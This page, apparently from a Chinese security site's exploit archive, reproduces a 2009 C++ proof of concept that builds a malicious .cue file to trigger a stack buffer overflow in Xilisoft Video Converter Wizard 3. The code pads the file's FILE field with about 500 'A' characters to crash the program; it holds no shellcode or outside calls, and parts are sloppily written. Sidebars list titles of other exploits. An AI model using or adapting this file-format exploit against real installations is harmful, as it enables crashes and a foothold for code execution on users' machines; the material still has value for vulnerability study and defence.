首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow PoC
来源:www.vfcocus.net 作者:fl0-fl0w 发布时间:2009-04-13  
/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
ScreanShot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.." 

class EXPLOIT {
public:

int check (char *, char *);
void Usage (char *);
};

static int  Poz = 1;
static int  Neg = 0;
 
int i;     

char Name [SIZE];   
char NeWbuff [SIZE];
                                           

                                                  int main (int argc, char *argv [])                                                                                          

{
        
        EXPLOIT VIDEO;
       
            
             if ( argc < 2)
            
                VIDEO.Usage ( argv [0]);
      
                                                  if ( VIDEO.check ( argv [1], "-file") == Neg) {
                                                  
                                                       fprintf ( stdout , " Incorect input ");
                                                      
                                                       printf ( " \t..Usage is %s -file filename.. \n", Name);
                                                                                                                             
                                                               exit ( 0);
                                                           
                                                            }
                                              
                                                                                
       
       
          do {
       
            NeWbuff [i] = 'A';
        
            i++;
              
            }while (i < 500);
              
      
       
        FILE *f;
       
        strcpy (Name, argv [2]);
       
        strcat (Name, " .cue ");
       
        f = fopen (Name, "w");
       
        assert ( f != NULL);
       
       
       
       
        strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF));
                                                                
         
       
        fputs("FILE \"", f);
       
        fprintf ( f, " %s ", NeWbuff);
              
               
        fprintf ( stdout , "File build ! ");
        
        exit ( 0); 
        
       getchar ();
      
                                                   return 0;       
                                                  }
                                                                                                   

                                                        
 
                                                  int EXPLOIT::check (char *Arg_, char *_Arg)
  
   {
       
       if ( strcmp ( Arg_, _Arg) == 0)
      
        return Poz;
       
      return Neg;
       
        }  
       
    void EXPLOIT::Usage (char *Name)
   
   {
     system ("cls");   
     fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
     printf ( " \t..Usage is %s -file filename.. \n", Name);   
     fprintf ( stdout , "..All Credits fl0 fl0w.. \n");
    
    
         }  
        
       
//EOF          
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·The IBM BladeCenter Advanced M
·Chance-i DiViS-Web DVR System
·SWF Opener 1.3 (.swf File) Off
·w3bcms Gaestebuch 3.0.0 Blind
·Exjune Guestbook v2 Remote Dat
·PHP 5.2.9 curl safe_mode and o
·Geeklog <= 1.5.2 SEC_authentic
·ftpdmin 0.96 RNFR Remote Buffe
·net2ftp versions 0.97 and belo
·Flatnuke <= 2.7.1 (level) Remo
·OTSTurntables 1.00.027 (.ofl)
·FreeBSD i386/AMD64 Execve /bin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved